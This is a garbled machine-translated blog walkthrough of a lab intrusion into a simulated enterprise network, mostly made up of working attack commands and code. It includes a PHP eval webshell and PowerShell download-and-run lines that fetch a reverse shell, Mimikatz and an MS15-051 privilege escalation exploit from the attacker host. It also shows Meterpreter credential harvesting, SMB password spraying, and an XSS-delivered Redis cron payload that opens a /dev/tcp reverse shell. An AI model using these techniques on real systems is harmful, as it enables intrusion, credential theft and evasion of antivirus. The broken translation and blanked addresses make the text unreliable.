No file penetration test

No file penetration test

— This is 60 bytes webshell acrobatics

Read an article the other day 《 Hundreds of banks and financial institutions around the world are infected with a “no file” malicious programs, almost impossible to detect
Think PowerShell is very magical, I want to personally experiment, in order to maximize the reduction of no file attack mode

Topology design

Topology introduction:

  • Among 192 .168.1.0/24 Simulation is the network environment
  • Simulation of the enterprise network environment
  • The web server NIC (network boundary: 192 .168.1.110, 172 of the internal network .21.132.110), Moreover, in order to ensure the most basic security, web border server set up a firewall, the firewall is only open to the outside world 80, 81443 ports, open all ports on the network, which is also equipped with the antivirus software.
  • The network also arranged a number of web servers, a bypass alarm device (IPS), they can be connected to the network, but the network access to any internal web server
  • One web server (Linux) (172) .21.132.113) Can not be placed in front of the firewall, network access to other web servers, but it can access to other servers within the network, and can be connected to the network. The environment inside the 192 .168.1.108 Hackers Kali attack aircraft, 192 .168.1.212 Hackers windows attack aircraft

Introduction to nishang and PowerSploit

  1. Nishang PowerShell is a special tool for penetration testing. Integrated framework, scripts and various payload. The script is by the author of Nishang in the real penetration testing process like prepared, with the actual value. Including the download and execution, keyboard records, DNS, delay commands and other scripts
  2. PowerSploit Is another Post Exploitation Related tools, Post Exploitation Foreign penetration test standard inside the thing, is to get something done after shell. PowerSploit is actually some PowerShell Scripts, including Inject -Dll( Inject DLL to the specified process )、Inject-Shellcode( Inject shellcode into execution process), Encrypt – Script( Text or script encryption), Get -GPPPassword( By groups .xml Get plaintext password), Invoke – ReverseDnsLookup( scanning DNS PTR Record)

Penetration begins

First, the fastcgi configuration error on the border web server causes the server to be getshell
Because there are a lot of online knife back, so I use the open source CKnife (the address: Cross platform version of Cknife released China knife Project address: Cknife GitHub )
Because the server has anti-virus software
So a word to do a Trojan horse
Bypass thinking reference: The advanced method of beat dog stick: Cknife method to modify the configuration of security dog seconds

I use the server-side Trojan content


eval('$ms509 ='.$_POST['Cknife']);



Replace Config .ini PHP_MAKE for


Connection mode

Get webshell, the first to use systeminfo to view system information,

First we can see that this is a win2008 r2 64 Bit system, and no system patch
So I can bounce a PowerShell out of it for further penetration
First nishang git clone Go to your web directory and find Invoke in the shell directory -PowerShellTcp.ps1, In order to facilitate the Invoke -PowerShellTcp.ps1 Copied to the root directory of web, I use NC to listen on port 8888 in your own computer, then the implementation of

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.108/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress -port 8888

Get a bounce out of PowerShell on NC

View permissions found relatively low only: IIS apppool\defaultapppool
So I need to improve the permissions
The general practice is to upload a exp kernel overflow, usually upload a exe, but I’m here directly from a distance to load a exe into the victim host memory, and let him do it, I’ll detail in “the fun of penetration (a)” in detail first, I
Download to my web directory below, and then use the exp (ms1564) .exe) Under the web root directory
And then run in the rebound shell

IEX (New-Object Net.WebClient).DownloadString('http://192.168.108/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl -ExeArgs "cmd" -ForceASLR

This is the implementation of whoamI to see if you can see the permissions
nt authority\system

(Ps: There is a hole, the ms15051 exp is just downloaded from an online, without modification, so when the instruction execution time parameter spaces, he would not have any reaction, no echo, after I try to execute the CMD when you can put shell permission to mention, very good, but if you execute this command PowerShell, then the shell will rebound in suspended animation)
This time in the machine to collect information:
First, use mimikatz to have a password from the landing:

IEX (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz

View the list of ARP

See a lot of machine in 172 .21.132.100-120 This segment
I call poershell scan

Port scan script download from here:


IEX (New-Object Net.WebClient).DownloadString('');Invoke-PortScan -StartAddress -EndAddress -ResolveHost -ScanPort

This time I use PowerShell to bounce a meterpreter
The use of powersploit framework, for some strange reasons, the author put the support in the MSF framework part removed, but after I find, find the last edition supports MSF part of the submission of the authors of the history inside:
The address is:–Shellcode.ps1
If Git clone The new version of PowerSploit you want to use the old version of CodeExecution /Invoke–Shellcode.ps1 Replace the new version of the file
The first method is to download the script to the hacker’s own web directory, in order to facilitate me, I wrote a call script placed in the web directory (1.ps1)

IEX(New-Object Net.WebClient).DownloadString('')
Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost -lport 4444 -force

First open the MSF, and then set the payload to windows /meterpreter/reverse_https, And listen to the 4444 port:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > run

Then the PowerShell rebound in the shell call

IEX (New-Object Net.WebClient).DownloadString('')

Successfully get meterpreter , Note: this meterpreter implementation of shell is not able to get interactive CMD
, Exp just because of the rebound into the system of the right of the PowerShell, so the meterpreter is also a rebound out of system permissions

This time can
meterpreter View routing:
run get_local_subnets

meterpreter Find putty saved information
run enum_putty

meterpreter Find the password saved by IE
run post/windows/gather/enum_ie

Local information gathering is almost enough
Put meterpreter in the background:

Then add the route (so as to scan the network):
route add 1
route add The first argument is the address, the second parameter address is the mask, and the third parameter is the sessis of the ID

Host scanning in the network: using SMB for host identification:
use auxiliary/scanner/smb/smb_version

Use just find the administrator password in the network inside the collision, to see how many hosts are using the same password
Use: use auxiliary/scanner/smb/smb_login

You can see most of the machine inside the intranet is a password using the

Below I want to use the socks agent into the internal network to get some information

There are three options:
First of all, MSF provides a proxy for socks4a, the browser can use this agent into the network, but burp can not use socks4a proxy
Second: can use reGeorgSocksProxy .py Socks5 into the inside of the network
Third: can be treated with special xsocks .exe, Through the PowerShell remote loading into the memory to run after the Socks5 agent

Because this is 60 bytes webshell acrobatics, so I use the third method to enter the network:

First of all, the hacker’s Web inside the special treatment of xsocks .exe, Then load with poweshell

IEX (New-Object Net.WebClient).DownloadString('');Invoke-ReflectivePEInjection -PEUrl -ExeArgs "-l 443" -ForceASLR

Then burp set:

In this setting Firefox

This effect can be achieved:

Look at the effect:

The flow interception down repeater can also be

  • Popularity of redis unauthorized knowledge
    Detailed article can see redis Unauthorized access summary
    The reason for the emergence of the CSRF redis vulnerability is: when sending invalid instructions to redis, redis itself will not terminate the agreement TCP link. At the same time, redis will only execute the body in the effective instruction, and will not care about http header Inside content.
  • Look at the science CSRF attack: CSRF: CSRF, also known as: one click attack/session riding, Abbreviated as: CSRF /XSRF, In simple terms, the attacker has stolen your identity and sent malicious requests in your name. CSRF can do things include: in your name to send mail, send messages, steal your account, or even buy goods, virtual currency transfer …… Problems include: personal privacy leaks and property security. The classic case of CSRF is through the CSRF to modify your home router DNS configuration, so as to achieve the purpose of illegal profits, you can refer to the article TP-link TL-WR840N Series Router CSRF vulnerability exists, you can modify any configuration (including POC test process)

After internal network detection, found 172 .21.132.113 Open 6379 ports, but can not be connected through the proxy
Later found in 172 .21.132.117:83/xss/add.php Find a message board

So according to this article: Client-Side Redis Attack Proof of Concept
I made a redis access can be used to get a rebound shell JS :

      var cmd = new XMLHttpRequest();"POST", "");

      var cmd = new XMLHttpRequest();"POST", "");
      cmd.send('eval \'' + '\"set\", \"1\",\"\\n\\n*/1 * * * * /bin/bash -i >& /dev/tcp/ 0>&1\\n\\n");\"config\", \"set\", \"dir\", \"/var/spool/cron/\");\"config\", \"set\", \"dbfilename\", \"root\");' + '\' 0' + "\r\n");

      var cmd = new XMLHttpRequest();"POST", "");

Put him in his web directory, and then write in the message board:

<script src=></script>

The machine monitor using NC to monitor 5566 ports, as long as the computer installed redis administrator to view the message board will pop up a shell to my host

You can see that this rebound has been handled by the shell is root permissions

So far, the entire network has been fully penetrated

The last tips:

I described above: poweshell loading external exe memory into execution, so as not to leave any trace in the victim host, but also can bypass the mainstream domestic soft kill killing
The realization of this idea is based on this article:
PowerPwning: Post-Exploiting ByOverpowering PowerShell
Also Powershell tricks::Code Execution & Process Injection

If this premise is achieved:
1. You have a source
2. Source must be C ++ Preparation, C # Write all crashes
3. Compile time recommended using VS2010 +winxp Compile
4. GCC can not be used to compile win
5. Compile using /MT perhaps /MTd

6. If you want to pass parameters, int main(int argc char **argv) Change

int main()
    LPWSTR *szArglist;
    int nArgs;
    int i;
    szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);
    if( NULL == szArglist )
        wprintf(L"CommandLineToArgvW failed\n");
        return 0;


7. The file can not be written in the operation

Here is MS150 -51exp Compiler process

I mention the right tool ms15 -051 Code to do experiments, Source code

Add code to pass parameters

There are several character conversion problem, you can solve yourself, I
After the formation of a good look at the effect
First of all, to generate a good ms15 -051.exe Upload to your web server

Download to the local look at what effect

Then use the compiled ms15 -051.exe Load with PowerShell

Leave a Reply

Your email address will not be published. Required fields are marked *